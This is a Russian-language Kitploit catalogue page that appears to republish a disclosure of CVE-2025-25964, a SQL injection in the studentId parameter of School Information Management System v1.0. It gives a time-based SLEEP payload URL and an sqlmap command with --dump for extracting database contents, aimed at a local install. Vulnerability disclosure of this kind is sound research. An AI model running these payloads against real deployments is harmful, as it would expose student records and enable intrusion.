Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-25964 — A critical SQL Injection vulnerability (CVE-2025-25964) discovered in the School Information Management System v1.0 | Kitploit
Инструменты/GitHubGitHub/sudo-sakib/cve-2025-25964
Vulnerability AnalysisWeb Application ExploitationPenetration TestingPapers & ResearchLearning & EducationDatabase Security
GitHubsudo-sakib/cve-2025-25964

CVE-2025-25964

A critical SQL Injection vulnerability (CVE-2025-25964) discovered in the School Information Management System v1.0

Репозиторий
221 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-25964: SQL-инъекция в School Information Management System v1.0

Введение

В современном цифровом мире SQL-инъекция (SQLi) остается одной из самых распространенных и опасных уязвимостей, встречающихся в веб-приложениях. В этой статье блога рассматривается критическая уязвимость SQL-инъекции (CVE-2025-25964), обнаруженная в School Information Management System v1.0, разработанной Itsourcecode. Эта уязвимость позволяет удаленным злоумышленникам эксплуатировать систему, что может привести к раскрытию конфиденциальной информации.

Обзор уязвимости

Идентификатор CVE: CVE-2025-25964

Тип уязвимости: SQL Injection (SQLi)

Затронутый продукт: Student Information Management System - v1.0

Затронутый компонент: параметр studentId в /columbans/admin/modules/student/index.php

Тип атаки: Удаленная

Серьезность: Высокая

Обнаружил: Sakib Shaikh

Шаги для воспроизведения

Чтобы продемонстрировать воздействие, выполните следующие пошаговые инструкции:

  1. Установите уязвимое приложение: Установите и настройте School Information Management System v1.0 на локальном сервере.

  2. Войдите в систему: Войдите, используя предоставленные Itsourcecode учетные данные.

  3. Получите доступ к уязвимой конечной точке:

http://localhost/columbans/admin/modules/student/index.php?view=view&studentId=20004207

  1. Внедрите SQL-полезную нагрузку для проверки SQL-инъекции:

http://localhost/columbans/admin/modules/student/index.php?view=view&studentId=20004207+AND+(SELECT+2657+FROM+(SELECT(SLEEP(10)))zKnT)

  1. Наблюдайте за ответом приложения: Если страница загружается более 10 секунд, SQL-инъекция подтверждена. Это доказывает, что серверная база данных выполняет внедренный SQL-запрос.

  2. Используйте SQLMap для автоматизированной эксплуатации:

root@kitploit:~
python sqlmap.py -u "http://localhost/columbans/admin/modules/student/index.php?view=view&studentId=20004207" \
--cookie="PHPSESSID=your_cookie_here" --risk 3 --level 3 --dbs --technique=T --dump --no-cast

Эта команда пытается извлечь имена баз данных, таблицы и конфиденциальную информацию из системы.

Анализ первопричины

Проблема возникает из-за неправильной санитизации входных данных в параметре studentId файла index.php. Когда злоумышленник изменяет параметр studentId, добавляя вредоносные SQL-полезные нагрузки, приложение обрабатывает ввод без надлежащей проверки, что приводит к SQL-инъекции.

Ссылки

https://itsourcecode.com/free-projects/php-project/st-columban-student-information-management-system/

https://owasp.org/www-community/attacks/SQL_Injection

Скачать инструмент